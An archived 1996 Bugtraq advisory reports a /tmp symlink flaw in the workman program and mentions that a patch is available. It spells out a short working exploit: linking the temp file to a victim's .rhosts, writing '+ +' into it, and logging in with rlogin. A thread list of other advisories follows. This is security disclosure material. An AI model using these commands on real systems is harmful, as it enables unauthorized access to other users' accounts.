Bugtraq mailing list archives
r00t advisory -- workman vunerability
From: gahull () ccs neu edu (Gregory Hull)
Date: Mon, 26 Aug 1996 12:21:15 -0400
r00t advisory [ workman ] [ Aug 25 1996 ] -- Synposis There exists a vunerability in workman that will allow any user to create and write to files owned by the user who is running workman. Workman creates a mode 666 file in /tmp and will gladly follow a symbolic link to it's target. -- Exploitability The exploit is absurdly simple: $ ln -s /home/target_user/.rhosts /tmp/.wm_pid # wait for target user to run workman $ echo "+ +" >/home/target_user/.rhosts $ rlogin -l localhost target_user -- Fixes ? The author of workman has been alerted to this problem and a patch is available from ggal () ccs neu edu. r00t -- http://www.r00t.org
Current thread:
- Re: Vulnerability in the Xt library Warner Losh (Aug 25)
- Re: Vulnerability in the Xt library Casper Dik (Aug 26)
- r00t advisory -- Sunny Day Virus Gregory Hull (Aug 26)
- r00t advisroy -- sol2.5 at(1) vunerability Gregory Hull (Aug 26)
- r00t advisory -- workman vunerability Gregory Hull (Aug 26)
- r00t advisory -- sol2.5 su(1M) vunerability Gregory Hull (Aug 26)
- SGI Security Advisory 19960802-01 - Vulnerability in expreserve SGI Security Coordinator (Aug 26)
- Privileges (was libresolv+ bug) Paul McNabb (Aug 26)
- [BUG] Vulnerability in PINE Sean B. Hamor (Aug 26)
- Tired of /tmp? Here's a proposed solution Igor Chudov @ home (Aug 26)
- Re: Tired of /tmp? Here's a proposed solution Guido M. Witmond (Aug 27)
- Re: Tired of /tmp? Here's a proposed solution Thomas Koenig (Aug 28)
- Re: Tired of /tmp? Here's a proposed solution Sean B. Hamor (Aug 28)
- Re: Tired of /tmp? Here's a proposed solution mdr () vodka sse att com (Aug 28)
- Rlogin vulnerabilty Gabriele Avosani (Aug 28)
- Tired of /tmp? Here's a proposed solution Igor Chudov @ home (Aug 26)